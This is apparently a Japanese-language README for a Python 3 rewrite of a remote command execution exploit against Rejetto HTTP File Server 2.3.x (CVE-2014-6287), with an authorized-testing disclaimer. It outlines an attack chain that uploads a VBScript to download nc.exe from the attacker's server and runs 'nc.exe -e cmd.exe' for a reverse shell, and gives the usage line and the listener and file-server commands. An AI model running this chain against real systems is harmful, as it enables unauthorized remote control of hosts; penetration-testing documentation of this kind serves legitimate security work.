
Rejetto HTTP File Server 2.3.x(CVE-2014-6287)向けのリモートコマンド実行エクスプロイトを、最新の攻撃的セキュリティテスト用にPython 3で書き直したものです。
これは、CVE-2014-6287 として特定されている脆弱性を利用した、Rejetto HTTP File Server (HFS) v2.3.x を標的とする古典的なリモートコマンド実行 (RCE) エクスプロイトの Python 3 による書き直しです。
当初は Avinash Kumar Thapa(別名 "-Acid") によって発見されました。このバージョンは、移植性と使いやすさを向上させ、完全なパラメータ化と最新環境との互換性を提供します。
このツールは、教育および許可されたペネトレーションテストのみを目的として提供されています。所有していない、またはテストする明示的な許可を得ていないシステムに対する不正使用は、違法かつ非倫理的です。
nc.exe をホストするために使用するポートnc.exe リバースシェル配信nc.exe をダウンロードする VBScript をアップロードnc.exe -e cmd.exe を実行してリバースシェルを確立python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
Requirements:
- HTTP server serving nc.exe:
python3 -m http.server 8000
- Listener:
nc -lvnp 4444